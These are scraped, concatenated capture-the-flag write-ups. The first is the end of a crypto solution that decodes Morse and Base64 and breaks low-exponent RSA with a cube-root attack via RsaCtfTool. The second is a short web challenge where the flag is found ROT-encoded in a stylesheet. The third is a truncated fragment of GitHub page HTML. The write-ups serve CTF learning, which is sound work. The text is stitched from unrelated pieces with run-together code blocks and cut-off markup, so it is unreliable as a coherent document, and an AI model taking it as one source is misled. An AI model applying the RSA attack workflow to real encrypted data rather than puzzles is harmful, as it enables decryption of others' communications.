79 68 77 50 78 106 73 50 77 68 103 119 77 68 65 120 77 68 73 51 78 68 69 53 67 109 85 103 80 83 65 122 67 109 77 103 80 83 65 120 78 84 73 120 78 106 99 48 77 106 81 121 78 122 77 53 78 122 99 48 77 122 89 51 77 68 73 52 79 84 65 121 78 122 77 121 78 122 81 49 77 68 69 51 77 122 81 119 77 84 73 51 78 106 85 52 79 68 73 48 79 68 99 119 77 68 103 122 77 122 103 53 78 122 77 121 77 122 73 49 77 68 73 120 78 122 65 122 78 84 89 122 78 122 85 120 78 68 103 52 77 84 103 50 77 68 107 50 77 106 69 52 78 106 77 53 78 122 85 121 78 84 89 61```
That can be [converted into ASCII](https://www.dcode.fr/code-ascii):```TiA9IDExNTQyNTk5NDQ5Mzk3MDg2MzYwNjIwNTg4NjQ5Mjc2MDIxNjMyNTA2ODg2ODMzMTg3NDk1MjE1Nzk0MDY2NjcwMTEzNjg2MTU2MDEyNjA2OTY1MDY0OTY1NDcyNTQzNDM4OTM2MjExMDg1NTk0NzE2NjA0NzIxNTI2MTk2NTMxMTI2NDcyOTc2NDg1MjMxODQ5NzAzNTEzNDMzODEyOTI4MDE0ODkxNTgyMjg1NDI0MjczNjk4NTMyMzg4MDMyNDc2NTcwNzM2Mjk4MzcwMTE1MDE0NTU2NDAwMzg1NzYzMjUyNTczODc3NzQyNzQ1MjAzNjk3MDc0NjY0MjQ5NDYzNTY0ODc0ODYyMTUwODU4MTA2MDM5NzAwMjM3NjE0OTA4NDU2NTgwMjM2OTU3ODY1MzUxOQplID0gMwpjID0gMTUyMTY3NDI0MjczOTc3NDM2NzAyODkwMjczMjc0NTAxNzM0MDEyNzY1ODgyNDg3MDA4MzM4OTczMjMyNTAyMTcwMzU2Mzc1MTQ4ODE4NjA5NjIxODYzOTc1MjU2Cg==```
Now it seems Base64 encoded. If we [decode](https://www.dcode.fr/code-base-64) it, we'll get these parameters:```N = 115425994493970863606205886492760216325068868331874952157940666701136861560126069650649654725434389362110855947166047215261965311264729764852318497035134338129280148915822854242736985323880324765707362983701150145564003857632525738777427452036970746642494635648748621508581060397002376149084565802369578653519e = 3c = 152167424273977436702890273274501734012765882487008338973232502170356375148818609621863975256```
Since we're in a crypto challenge, this notation suggests [RSA](https://en.wikipedia.org/wiki/RSA_(cryptosystem)). Said public-key cryptosystem is based on this operation:
$$ c = p^e \pmod n $$
### Attack RSA
In this case, the exponent $ e=3 $ is too low that $p$ is susceptible to being obtained by calculating the $e$-th root of $ c $ (that's known as the ["cube-root RSA attack"](https://crypto.stackexchange.com/questions/33561/cube-root-attack-rsa-with-low-exponent)):
$$ p = \sqrt[e]{c} \quad (\text{if }p^e < n) $$
Using [RsaCtfTool](https://github.com/Ganapati/RsaCtfTool/):```$ python3 RsaCtfTool.py --verbosity DEBUG --attack cube_root -n $N -e $e --uncipher $cprivate argument is not set, the private key will not be displayed, even if recovered.
[*] Testing key /tmp/tmp5rna7l4c.[*] Performing cube_root attack on /tmp/tmp5rna7l4c.
Results for /tmp/tmp5rna7l4c:
Unciphered data :HEX : 0x436278727a626120416e7a7266INT (big endian) : 5338762031123926997889413968486INT (little endian) : 8116701877186273491947517141571utf-8 : Cbxrzba AnzrfSTR : b'Cbxrzba Anzrf'```
### Get the flag
Those two words may be Caesar-encoded... Let's try to decode them with [ROT13](https://www.dcode.fr/chiffre-rot):```Pokemon Names```
So now we know that, if we apply ROT13-decoding to that $p$ number we obtained before (expressed as a string in UTF8), we get some words that make sense.
Input will change 5 more times (if we repeat all this process to every input, names like "[Wobbuffet](https://www.pokemon.com/us/pokedex/wobbuffet)", "[Forretress](https://www.pokemon.com/us/pokedex/forretress)", "[Bouffalant](https://www.pokemon.com/us/pokedex/bouffalant)", "[Froakie](https://www.pokemon.com/us/pokedex/froakie)" and "[Bergmite](https://www.pokemon.com/us/pokedex/bergmite)" will be revealed). After sending each result as a response to each input crypto.chal.csaw.io:5001 gives to us, we finally get the flag from the server:```flag{We're_ALrEadY_0N_0uR_waY_7HE_j0UrnEY_57aR75_70day!}```
## Alternative ways
### Gotta script them all
Just running [this script `pokemon_names.py`](https://gist.github.com/jartigag/b0c35d09876274451a50a8689ddd4151):
```$ python3 pokemon_names.pyPokemon NamesWobbuffetArctovishBouffalantFroakieArctozolt```
### Gotta chef them first
[](https://gchq.github.io/CyberChef/#recipe=From_Morse_Code('Space','Forward%20slash')From_Decimal('Space',false)From_Base64('A-Za-z0-9%2B/%3D',true)&input=LS0tLi4gLi4uLi0gLy4tLS0tIC0tLS0tIC4uLi4uIC8tLi4uLiAuLi4uLiAvLi4uLi4gLS0uLi4gLy0tLi4uIC4uLi0tIC8tLi4uLiAtLS0uLiAvLi0tLS0gLS0tLS0gLi4uLS0gLy4tLS0tIC4uLS0tIC4tLS0tIC8tLS4uLiAtLS4uLiAvLi0tLS0gLi4tLS0gLi4tLS0gLy4tLS0tIC0tLS0tIC0tLi4uIC8uLS0tLSAuLi0tLSAuLS0tLSAvLS0uLi4gLS0uLi4gLy0uLi4uIC0tLS4uIC8tLi4uLiAuLi4uLiAvLi0tLS0gLi4tLS0gLS0tLS0gLy0tLi4uIC0tLi4uIC8tLi4uLiAtLS0uLiAvLS0uLi4gLi4uLS0gLy4tLS0tIC4uLS0tIC4uLS0tIC8tLS4uLiAtLS0uLiAvLi0tLS0gLS0tLS0gLS4uLi4gLy0tLS4uIC4uLi4uIC8uLi4uLSAtLS0tLiAvLS0uLi4gLS0uLi4gLy4tLS0tIC4uLS0tIC4uLS0tIC8tLS0tLiAtLS0tLiAvLi0tLS0gLi0tLS0gLS0tLS4gLy0tLi4uIC0tLS0uIC8tLS0uLiAuLi4uLSAvLS0tLi4gLi0tLS0gLy4uLi4uIC4uLS0tIC8tLS4uLiAtLS0tLiAvLS0tLi4gLi4uLi0gLy0tLS4uIC0tLS0uIC8uLi4uLiAuLi0tLSAvLS0uLi4gLS0uLi4gLy0uLi4uIC0tLS4uIC8tLi4uLiAtLS0tLiAvLi0tLS0gLi4tLS0gLS0tLS0gLy0tLi4uIC0tLS0uIC8tLi4uLiAtLS0uLiAvLi0tLS0gLS0tLS0gLS0uLi4gLy4uLi4uIC4tLS0tIC8tLS4uLiAtLS0uLiAvLS0tLi4gLi4uLi0gLy0uLi4uIC0tLS0uIC8uLi4uLiAuLi4tLSAvLS0uLi4gLS0tLi4gLy0uLi4uIC0tLS4uIC8tLS0uLiAtLS0tLiAvLi4uLi4gLS0tLS0gLy0tLi4uIC0tLS4uIC8uLS0tLSAuLi0tLSAuLi0tLSAvLS4uLi4gLi4uLi4gLy4tLS0tIC4uLS0tIC4tLS0tIC8tLS4uLiAtLS0tLiAvLS4uLi4gLS0tLi4gLy0uLi4uIC4uLi4uIC8uLi4uLiAtLS0tLSAvLS0uLi4gLS0tLi4gLy0tLS4uIC4uLi4tIC8uLS0tLSAtLS0tLSAtLS4uLiAvLi0tLS0gLi4tLS0gLi0tLS0gLy0tLi4uIC0tLS4uIC8tLS0uLiAuLi4uLSAvLi0tLS0gLS0tLS0gLS0uLi4gLy4uLi4uIC0tLS0tIC8tLS4uLiAtLS4uLiAvLS0tLi4gLi4uLi0gLy0tLS4uIC4tLS0tIC8uLS0tLSAuLS0tLSAtLS0tLiAvLS0uLi4gLS0uLi4gLy0uLi4uIC0tLS4uIC8tLi4uLiAtLS0tLiAvLi0tLS0gLi4tLS0gLS0tLS0gLy0tLi4uIC0tLS4uIC8uLS0tLSAuLi0tLSAuLi0tLSAvLS0tLi4gLi4uLi4gLy4tLS0tIC4tLS0tIC0tLS0uIC8tLS4uLiAtLS0tLiAvLS4uLi4gLS0tLi4gLy0tLi4uIC4uLi0tIC8uLi4uLiAuLi4tLSAvLS0uLi4gLS0tLi4gLy0uLi4uIC0tLS4uIC8tLS0uLiAuLi4uLiAvLi0tLS0gLi4tLS0gLS0tLS0gLy0tLi4uIC0tLi4uIC8tLS0uLiAuLi4uLSAvLS0tLi4gLi0tLS0gLy4tLS0tIC4tLS0tIC0tLS0uIC8tLS4uLiAtLS4uLiAvLi0tLS0gLi4tLS0gLi4tLS0gLy0tLS4uIC0tLS0uIC8uLi4uLiAtLS0tLSAvLS0uLi4gLS0tLS4gLy0tLS4uIC4uLi4tIC8tLS4uLiAuLi4tLSAvLi4uLi0gLS0tLi4gLy0tLi4uIC0tLS0uIC8tLS0uLiAuLi4uLSAvLS0tLi4gLi0tLS0gLy4uLi4uIC4uLS0tIC8tLS4uLiAtLS0tLiAvLS0tLi4gLi4uLi0gLy0uLi4uIC0tLS0uIC8uLi4uLiAuLS0tLSAvLS0uLi4gLS0tLi4gLy4tLS0tIC0tLS0tIC0uLi4uIC8tLi4uLiAuLi4uLiAvLi0tLS0gLi0tLS0gLS0tLS4gLy0tLi4uIC0tLS4uIC8uLS0tLSAtLS0tLSAtLi4uLiAvLi0tLS0gLS0tLS0gLS0uLi4gLy4uLi4uIC4uLi0tIC8tLS4uLiAtLS0tLiAvLS4uLi4gLS0tLi4gLy4tLS0tIC0tLS0tIC4uLi0tIC8uLS0tLSAuLS0tLSAtLS0tLiAvLS0uLi4gLS0tLi4gLy4tLS0tIC0tLS0tIC0uLi4uIC8tLS0uLiAuLi4uLiAvLi4uLi4gLS0tLS0gLy0tLi4uIC0tLS4uIC8uLS0tLSAtLS0tLSAtLi4uLiAvLi0tLS0gLS0tLS0gLi4uLS0gLy4uLi4uIC4uLi0tIC8tLS4uLiAtLS0uLiAvLS0tLi4gLi4uLi0gLy0tLS4uIC4uLi4uIC8uLS0tLSAuLi0tLSAuLS0tLSAvLS0uLi4gLS0tLi4gLy0tLS4uIC4uLi4tIC8tLS4uLiAuLi4tLSAvLi0tLS0gLi0tLS0gLS0tLS4gLy0tLi4uIC0tLS4uIC8tLi4uLiAtLS0uLiAvLS0uLi4gLi4uLS0gLy4uLi4uIC4uLS0tIC8tLS4uLiAtLS0uLiAvLi0tLS0gLS0tLS0gLS4uLi4gLy0tLi4uIC0tLi4uIC8uLi4uLiAuLi4tLSAvLS0uLi4gLS0tLi4gLy0uLi4uIC0tLS4uIC8tLi4uLiAtLS0tLiAvLi0tLS0gLi4tLS0gLi0tLS0gLy0tLi4uIC0tLS4uIC8tLi4uLiAtLS0uLiAvLS0tLi4gLS0tLS4gLy4uLi4tIC0tLS0uIC8tLS4uLiAtLS0uLiAvLi0tLS0gLi4tLS0gLi4tLS0gLy0tLS4uIC0tLS0uIC8uLS0tLSAuLi0tLSAtLS0tLSAvLS0uLi4gLS0uLi4gLy4tLS0tIC0tLS0tIC0uLi4uIC8uLS0tLSAtLS0tLSAuLi4tLSAvLi4uLi0gLS0tLS4gLy0tLi4uIC0tLS4uIC8tLS0uLiAuLi4uLSAvLS0uLi4gLS0uLi4gLy4uLi4uIC0tLS0tIC8tLS4uLiAtLS0tLiAvLS4uLi4gLS0tLi4gLy4tLS0tIC0tLS0tIC4uLi0tIC8uLi4uLiAtLS0tLSAvLS0uLi4gLS0tLi4gLy4tLS0tIC0tLS0tIC0uLi4uIC8tLS4uLiAuLi4tLSAvLi4uLi0gLS0tLS4gLy0tLi4uIC0tLS0uIC8tLS0uLiAuLi4uLSAvLS0uLi4gLS0uLi4gLy4tLS0tIC4uLS0tIC4uLS0tIC8tLS4uLiAtLS0tLiAvLS0tLi4gLi4uLi0gLy0tLS0uIC0tLS0uIC8uLi4uLiAuLi4tLSAvLS0uLi4gLS0uLi4gLy4tLS0tIC4uLS0tIC4uLS0tIC8uLS0tLSAtLS0tLSAuLi4tLSAvLi4uLi0gLS0tLi4gLy0tLi4uIC0tLS4uIC8uLS0tLSAuLi0tLSAuLi0tLSAvLS0tLi4gLS0tLS4gLy4tLS0tIC4tLS0tIC0tLS0uIC8tLS4uLiAtLS0tLiAvLS4uLi4gLS0tLi4gLy0tLi4uIC4uLi0tIC8uLS0tLSAuLi0tLSAtLS0tLSAvLS0uLi4gLS0tLi4gLy4tLS0tIC0tLS0tIC0uLi4uIC8tLS4uLiAuLi4tLSAvLi0tLS0gLi4tLS0gLS0tLS0gLy0tLi4uIC0tLi4uIC8uLS0tLSAuLi0tLSAuLi0tLSAvLS0uLi4gLi4uLS0gLy4uLi4uIC4tLS0tIC8tLS4uLiAtLS0uLiAvLi0tLS0gLS0tLS0gLS4uLi4gLy0uLi4uIC4uLi4uIC8uLi4uLiAtLS0tLSAvLS0uLi4gLS0uLi4gLy0tLS4uIC4uLi4tIC8tLi4uLiAuLi4uLiAvLi4uLi4gLi0tLS0gLy0tLi4uIC0tLi4uIC8tLS0uLiAuLi4uLSAvLS4uLi4gLi4uLi4gLy4uLi4uIC0tLS0tIC8tLS4uLiAtLS0uLiAvLi0tLS0gLS0tLS0gLS4uLi4gLy0tLi4uIC0tLi4uIC8uLS0tLSAuLi0tLSAuLi0tLSAvLS0uLi4gLS0tLS4gLy0tLS4uIC4uLi4tIC8tLS0uLiAtLS0tLiAvLi0tLS0gLi4tLS0gLS0tLS0gLy0tLi4uIC0tLS4uIC8uLS0tLSAtLS0tLSAtLi4uLiAvLi0tLS0gLS0tLS0gLi4uLS0gLy4uLi4tIC0tLS0uIC8tLS4uLiAtLS4uLiAvLi0tLS0gLS0tLS0gLS4uLi4gLy4tLS0tIC0tLS0tIC0tLi4uIC8uLi4uLiAuLi4tLSAvLS0uLi4gLS0uLi4gLy0tLS4uIC4uLi4tIC8tLS4uLiAuLi4tLSAvLi4uLi0gLS0tLS4gLy0tLi4uIC0tLS4uIC8tLS0uLiAuLi4uLSAvLS0tLi4gLi4uLi4gLy4uLi4uIC4uLS0tIC8tLS4uLiAtLS0uLiAvLi0tLS0gLi4tLS0gLi4tLS0gLy0tLi4uIC0tLi4uIC8uLi4uLiAuLi4tLSAvLS0uLi4gLS0tLi4gLy0tLS4uIC4uLi4tIC8uLS0tLSAtLS0tLSAtLS4uLiAvLi4uLi0gLS0tLi4gLy0tLi4uIC0tLS4uIC8uLS0tLSAuLi0tLSAuLi0tLSAvLS0uLi4gLi4uLS0gLy4uLi4uIC0tLS0tIC8tLS4uLiAtLS0uLiAvLS0tLi4gLi4uLi0gLy0tLS4uIC4tLS0tIC8uLi4uLiAuLi4tLSAvLS0uLi4gLS0tLi4gLy4tLS0tIC0tLS0tIC0uLi4uIC8tLi4uLiAuLi4uLiAvLi4uLi0gLS0tLS4gLy0tLi4uIC0tLi4uIC8uLS0tLSAuLi0tLSAuLi0tLSAvLS0tLi4gLS0tLS4gLy4tLS0tIC4uLS0tIC4tLS0tIC8tLS4uLiAtLS0uLiAvLi0tLS0gLS0tLS0gLS4uLi4gLy0uLi4uIC0tLS0uIC8uLS0tLSAuLi0tLSAtLS0tLSAvLS0uLi4gLS0tLi4gLy4tLS0tIC4uLS0tIC4uLS0tIC8tLS0uLiAuLi4uLiAvLi4uLi0gLS0tLS4gLy0tLi4uIC0tLS0uIC8tLS0uLiAuLi4uLSAvLS4uLi4gLi4uLi4gLy4uLi4tIC0tLS0uIC8tLS4uLiAtLS0uLiAvLi0tLS0gLi4tLS0gLi4tLS0gLy0tLS0uIC0tLS0uIC8uLS0tLSAuLi0tLSAuLi0tLSAvLS0uLi4gLS0uLi4gLy0uLi4uIC0tLS4uIC8tLS0uLiAuLi4uLiAvLi4uLi0gLS0tLS4gLy0tLi4uIC0tLS4uIC8tLS0uLiAuLi4uLSAvLi0tLS0gLS0tLS0gLi4uLS0gLy4uLi4tIC0tLS0uIC8tLS4uLiAtLS0uLiAvLi0tLS0gLS0tLS0gLS4uLi4gLy4tLS0tIC0tLS0tIC4uLi0tIC8uLS0tLSAuLi0tLSAuLS0tLSAvLS0uLi4gLS0tLS4gLy0tLS4uIC4uLi4tIC8tLi4uLiAuLi4uLiAvLi0tLS0gLi0tLS0gLS0tLS4gLy0tLi4uIC0tLi4uIC8tLS0uLiAuLi4uLSAvLS0tLi4gLS0tLS4gLy4uLi4uIC4uLi0tIC8tLS4uLiAtLS4uLiAvLS0tLi4gLi4uLi0gLy4tLS0tIC0tLS0tIC0tLi4uIC8uLS0tLSAuLS0tLSAtLS0tLiAvLS0uLi4gLS0tLS4gLy0tLS4uIC4uLi4tIC8uLS0tLSAtLS0tLSAtLS4uLiAvLi4uLi0gLS0tLS4gLy0tLi4uIC0tLi4uIC8tLi4uLiAtLS0uLiAvLS0uLi4gLi4uLS0gLy4uLi4uIC0tLS0tIC8tLS4uLiAtLS0uLiAvLi0tLS0gLS0tLS0gLS4uLi4gLy0tLS4uIC4tLS0tIC8uLS0tLSAuLi0tLSAuLi0tLSAvLS0uLi4gLS0uLi4gLy0uLi4uIC0tLS4uIC8uLS0tLSAtLS0tLSAuLi4tLSAvLi4uLi4gLi4uLS0gLy0tLi4uIC0tLi4uIC8uLS0tLSAtLS0tLSAtLi4uLiAvLS4uLi4gLS0tLS4gLy4tLS0tIC4tLS0tIC0tLS0uIC8tLS4uLiAtLS0tLiAvLS0tLi4gLi4uLi0gLy0tLS4uIC4tLS0tIC8uLS0tLSAuLi0tLSAtLS0tLSAvLS0uLi4gLS0tLi4gLy4tLS0tIC4uLS0tIC4uLS0tIC8tLS0uLiAtLS0tLiAvLi0tLS0gLi4tLS0gLi4tLS0gLy0tLi4uIC0tLi4uIC8uLS0tLSAuLi0tLSAuLi0tLSAvLS0tLS4gLS0tLS4gLy4uLi4tIC0tLS4uIC8tLS4uLiAtLS0uLiAvLi0tLS0gLS0tLS0gLS4uLi4gLy0tLS4uIC4tLS0tIC8uLi4uLSAtLS0tLiAvLS0uLi4gLS0uLi4gLy4tLS0tIC4uLS0tIC4uLS0tIC8tLS0uLiAuLi4uLiAvLi0tLS0gLi4tLS0gLi0tLS0gLy0tLi4uIC0tLS0uIC8tLi4uLiAtLS0uLiAvLi0tLS0gLS0tLS0gLS0uLi4gLy4uLi4uIC4tLS0tIC8tLS4uLiAtLS0uLiAvLi0tLS0gLS0tLS0gLS4uLi4gLy0tLS4uIC4uLi4uIC8uLi4uLSAtLS0tLiAvLS0uLi4gLS0tLi4gLy0uLi4uIC0tLS4uIC8tLi4uLiAtLS0tLiAvLi4uLi4gLi4tLS0gLy0tLi4uIC0tLS4uIC8tLi4uLiAtLS0uLiAvLS0tLi4gLi4uLi4gLy4uLi4uIC0tLS0tIC8tLS4uLiAtLS4uLiAvLS4uLi4gLS0tLi4gLy0tLi4uIC0tLi4uIC8uLS0tLSAuLS0tLSAtLS0tLiAvLS0uLi4gLS0uLi4gLy0uLi4uIC0tLS4uIC8tLS0uLiAuLi4uLiAvLi0tLS0gLi0tLS0gLS0tLS4gLy0tLi4uIC0tLS4uIC8tLi4uLiAtLS0uLiAvLS4uLi4gLi4uLi4gLy4uLi4uIC4uLi0tIC8tLS4uLiAtLS0tLiAvLS0tLi4gLi4uLi0gLy0uLi4uIC4uLi4uIC8uLi4uLiAuLi0tLSAvLS0uLi4gLS0uLi4gLy4tLS0tIC4uLS0tIC4uLS0tIC8tLS4uLiAtLS4uLiAvLi0tLS0gLi4tLS0gLS0tLS0gLy0tLi4uIC0tLS4uIC8uLS0tLSAuLi0tLSAuLi0tLSAvLS4uLi4gLi4uLi4gLy4tLS0tIC4uLS0tIC4uLS0tIC8tLS4uLiAtLS0tLiAvLS0tLi4gLi4uLi0gLy4tLS0tIC0tLS0tIC0tLi4uIC8uLi4uLiAuLi4tLSAvLS0uLi4gLS0tLi4gLy0tLS4uIC4uLi4tIC8uLS0tLSAtLS0tLSAtLS4uLiAvLi4uLi0gLS0tLS4gLy0tLi4uIC0tLi4uIC8uLS0tLSAuLi0tLSAuLi0tLSAvLS4uLi4gLS0tLS4gLy4uLi4uIC0tLS0tIC8tLS4uLiAtLS0tLiAvLS4uLi4gLS0tLi4gLy0tLi4uIC0tLi4uIC8uLi4uLiAtLS0tLSAvLS0uLi4gLS0tLi4gLy4tLS0tIC0tLS0tIC0uLi4uIC8tLS4uLiAuLi4tLSAvLi4uLi4gLS0tLS0gLy0tLi4uIC0tLi4uIC8tLi4uLiAtLS0uLiAvLi0tLS0gLS0tLS0gLi4uLS0gLy4tLS0tIC4tLS0tIC0tLS0uIC8tLS4uLiAtLS4uLiAvLS4uLi4gLS0tLi4gLy0uLi4uIC4uLi4uIC8uLS0tLSAuLi0tLSAtLS0tLSAvLS0uLi4gLS0uLi4gLy0uLi4uIC0tLS4uIC8tLS4uLiAuLi4tLSAvLi4uLi4gLi0tLS0gLy0tLi4uIC0tLS4uIC8tLi4uLiAtLS0uLiAvLS4uLi4gLS0tLS4gLy4uLi4uIC4uLi0tIC8tLi4uLiAtLS4uLiAvLi0tLS0gLS0tLS0gLS0tLS4gLy0tLS4uIC4uLi4uIC8uLS0tLSAtLS0tLSAuLi4tLSAvLS0tLi4gLS0tLS0gLy0tLS4uIC4uLi0tIC8tLi4uLiAuLi4uLiAvLi0tLS0gLi4tLS0gLi4tLS0gLy0uLi4uIC0tLi4uIC8uLS0tLSAtLS0tLSAtLS0tLiAvLS0uLi4gLS0uLi4gLy4tLS0tIC0tLS0tIC4uLi0tIC8tLS0uLiAtLS0tLSAvLS0tLi4gLi4uLS0gLy0uLi4uIC4uLi4uIC8uLS0tLSAuLi0tLSAtLS0tLSAvLS0uLi4gLS0tLi4gLy0tLS4uIC4uLi4tIC8tLS4uLiAuLi4tLSAvLi0tLS0gLi4tLS0gLS0tLS0gLy0tLi4uIC0tLS4uIC8uLS0tLSAtLS0tLSAtLi4uLiAvLS0tLS4gLS0tLS4gLy4uLi4tIC0tLS4uIC8tLS4uLiAtLS4uLiAvLi0tLS0gLS0tLS0gLS4uLi4gLy0tLS4uIC4tLS0tIC8uLS0tLSAuLi0tLSAuLS0tLSAvLS0uLi4gLS0tLi4gLy4tLS0tIC4uLS0tIC4uLS0tIC8tLS4uLiAtLS4uLiAvLi4uLi4gLi4uLS0gLy0tLi4uIC0tLS4uIC8uLS0tLSAuLi0tLSAuLi0tLSAvLS0tLS4gLS0tLS4gLy4uLi4tIC0tLS4uIC8tLS4uLiAtLS4uLiAvLi0tLS0gLi4tLS0gLi4tLS0gLy0tLS4uIC0tLS0uIC8uLi4uLiAuLS0tLSAvLS0uLi4gLS0uLi4gLy0uLi4uIC0tLS4uIC8tLS4uLiAuLi4tLSAvLi4uLi4gLi4tLS0gLy0tLi4uIC0tLS0uIC8tLS0uLiAuLi4uLSAvLS4uLi4gLi4uLi4gLy4tLS0tIC4uLS0tIC4tLS0tIC8tLS4uLiAtLS0uLiAvLi0tLS0gLi4tLS0gLi4tLS0gLy0tLi4uIC0tLi4uIC8uLS0tLSAuLi0tLSAuLS0tLSAvLS0uLi4gLS0tLi4gLy4tLS0tIC4uLS0tIC4uLS0tIC8tLS0uLiAuLS0tLSAvLi4uLi0gLS0tLS4gLy0tLi4uIC0tLi4uIC8tLi4uLiAtLS0uLiAvLS4uLi4gLS0tLS4gLy4uLi4uIC4tLS0tIC8tLS4uLiAtLS4uLiAvLi0tLS0gLi4tLS0gLi4tLS0gLy0tLS4uIC4tLS0tIC8uLS0tLSAuLS0tLSAtLS0tLiAvLS0uLi4gLS0uLi4gLy0tLS4uIC4uLi4tIC8tLS4uLiAuLi4tLSAvLi4uLi4gLi0tLS0gLy0tLi4uIC0tLS4uIC8uLS0tLSAtLS0tLSAtLi4uLiAvLS0tLi4gLi4uLi4gLy4uLi4uIC4uLS0tIC8tLS4uLiAtLS0tLiAvLS4uLi4gLS0tLi4gLy0tLi4uIC4uLi0tIC8uLi4uLSAtLS0uLiAvLS0uLi4gLS0tLS4gLy0uLi4uIC0tLS4uIC8tLS0tLiAtLS0tLiAvLi0tLS0gLi0tLS0gLS0tLS4gLy0tLi4uIC0tLi4uIC8tLi4uLiAtLS0uLiAvLi0tLS0gLS0tLS0gLi4uLS0gLy4tLS0tIC4uLS0tIC4uLS0tIC8tLS4uLiAtLS4uLiAvLi0tLS0gLi4tLS0gLi4tLS0gLy4tLS0tIC0tLS0tIC4uLi0tIC8uLi4uLiAuLi4tLSAvLS0uLi4gLS0tLi4gLy4tLS0tIC4uLS0tIC4uLS0tIC8tLS4uLiAtLS4uLiAvLi0tLS0gLi4tLS0gLi0tLS0gLy0tLi4uIC0tLi4uIC8uLS0tLSAuLi0tLSAuLi0tLSAvLS0uLi4gLi4uLS0gLy4uLi4tIC0tLS0uIC8tLS4uLiAtLS4uLiAvLS4uLi4gLS0tLi4gLy0tLi4uIC4uLi0tIC8uLS0tLSAuLi0tLSAtLS0tLSAvLS0uLi4gLS0tLi4gLy4tLS0tIC4uLS0tIC4uLS0tIC8tLi4uLiAuLi4uLiAvLi0tLS0gLi4tLS0gLi4tLS0gLy0tLi4uIC0tLS4uIC8tLS0uLiAuLi4uLSAvLS0tLi4gLS0tLS4gLy4tLS0tIC4uLS0tIC4uLS0tIC8tLS4uLiAtLS0uLiAvLi0tLS0gLi4tLS0gLi4tLS0gLy0tLS4uIC4uLi4uIC8uLS0tLSAuLi0tLSAtLS0tLSAvLS0uLi4gLS0tLi4gLy0uLi4uIC0tLS4uIC8uLS0tLSAtLS0tLSAuLi4tLSAvLi4uLi4gLi4tLS0gLy0tLi4uIC0tLi4uIC8tLS0uLiAuLi4uLSAvLi0tLS0gLS0tLS0gLi4uLS0gLy4uLi4uIC0tLS0tIC8tLS4uLiAtLS4uLiAvLS4uLi4gLS0tLi4gLy4tLS0tIC0tLS0tIC0tLi4uIC8uLi4uLiAtLS0tLSAvLS0uLi4gLS0uLi4gLy4tLS0tIC0tLS0tIC0uLi4uIC8tLi4uLiAtLS0tLiAvLi4uLi4gLi4tLS0gLy0tLi4uIC0tLS4uIC8uLS0tLSAtLS0tLSAtLi4uLiAvLS0uLi4gLS0uLi4gLy4uLi4uIC4uLi0tIC8tLS4uLiAtLS0uLiAvLi0tLS0gLi4tLS0gLi4tLS0gLy0tLS4uIC4uLi4uIC8uLS0tLSAuLi0tLSAuLS0tLSAvLS0uLi4gLS0tLi4gLy0tLS4uIC4uLi4tIC8tLS0uLiAtLS0tLiAvLS4uLi4gLi0tLS0)
### Gotta pipe them all
```bash$ cat morse.sed # based on https://stackoverflow.com/a/60139038# .=short -=longs/-----/0/gs/\.----/1/gs/\.\.---/2/gs/\.\.\.--/3/gs/\.\.\.\.-/4/gs/\.\.\.\.\./5/gs/-\.\.\.\./6/gs/--\.\.\./7/gs/---\.\./8/gs/----\./9/g$ export $(grep -v What input | sed 's/\//\n/g' | sed -Ef morse.sed | sed 's/ //g' | awk -F_ '{printf("%c",$0)}' | base64 -d | sed 's/ //g')$ python RsaCtfTool.py --attack cube_root -n $N -e $e --uncipher $c | grep utf-8 | tr 'A-Za-z' 'N-ZA-Mn-za-m' | awk '{$1="";$2="";print $0}' Pokemon Names``` |
# Here's-a-Flag Category: Web Points: 150 Description: A quick teaser to get yourself ready for the challenges to come! Just look for/at the flag and perhaps try your hand at some frontend tomfoolery? Url: http://very.uniquename.xyz:2086/ 
# Examming Website
When We go to website, it was just normal. There is nothing interesting.

So let look at the page's source code.
As you can see, we can see three interesting. They are `fake flag` and `index.js` and `styles.css`. So let look at all.

If we look into `index.js` we can see base64 strings. Let decode it
After decode the base64 strings, we got youtube video link.
Lol. That was just troll. ?
So let look at the `styles.css`. In this file, you can see `ROT13` string. Cool! Let decode this.
When we deocde it with `23` Amount, we got flag.
# SummaryEasy Challenge but give us a reminder to check all files in next ctf website.
# Flagdsc{welcome_to_deconstructf}
# Thanks For reading! |
<html lang="en" data-color-mode="auto" data-light-theme="light" data-dark-theme="dark"> <head> <meta charset="utf-8"> <link rel="dns-prefetch" href="https://github.githubassets.com"> <link rel="dns-prefetch" href="https://avatars.githubusercontent.com"> <link rel="dns-prefetch" href="https://github-cloud.s3.amazonaws.com"> <link rel="dns-prefetch" href="https://user-images.githubusercontent.com/"> <link rel="preconnect" href="https://github.githubassets.com" crossorigin> <link rel="preconnect" href="https://avatars.githubusercontent.com">
<link crossorigin="anonymous" media="all" integrity="sha512-L06pZD/4Yecj8D8pY5aYfA7oKG6CI8/hlx2K9ZlXOS/j5TnYEjrusaVa9ZIb9O3/tBHmnRFLzaC1ixcafWtaAg==" rel="stylesheet" href="https://github.githubassets.com/assets/light-2f4ea9643ff861e723f03f296396987c.css" /><link crossorigin="anonymous" media="all" integrity="sha512-xcx3R1NmKjgOAE2DsCHYbus068pwqr4i3Xaa1osduISrxqYFi3zIaBLqjzt5FM9VSHqFN7mneFXK73Z9a2QRJg==" rel="stylesheet" href="https://github.githubassets.com/assets/dark-c5cc774753662a380e004d83b021d86e.css" /><link data-color-theme="dark_dimmed" crossorigin="anonymous" media="all" integrity="sha512-xlDV9el7Cjd+KTSbwspx+c8its28uxn++hLZ9pqYYo1zOVcpLPlElTo42iA/8gV3xYfLvgqRZ3dQPxHCu4UaOQ==" rel="stylesheet" data-href="https://github.githubassets.com/assets/dark_dimmed-c650d5f5e97b0a377e29349bc2ca71f9.css" /><link data-color-theme="dark_high_contrast" crossorigin="anonymous" media="all" integrity="sha512-jkzjbgytRSAyC4EMcrdpez+aJ2CROSpfemvgO2TImxO6XgWWHNG2qSr2htlD1SL78zfuPXb+iXaVTS5jocG0DA==" rel="stylesheet" data-href="https://github.githubassets.com/assets/dark_high_contrast-8e4ce36e0cad4520320b810c72b7697b.css" /><link data-color-theme="dark_colorblind" crossorigin="anonymous" media="all" integrity="sha512-FzS8HhJ7XSHmx/dBll4FYlvu+8eivvb7jnttZy9KM5plsMkgbEghYKJszrFFauqQvv7ezYdbk7v/d8UtdjG9rw==" rel="stylesheet" data-href="https://github.githubassets.com/assets/dark_colorblind-1734bc1e127b5d21e6c7f741965e0562.css" /><link data-color-theme="light_colorblind" crossorigin="anonymous" media="all" 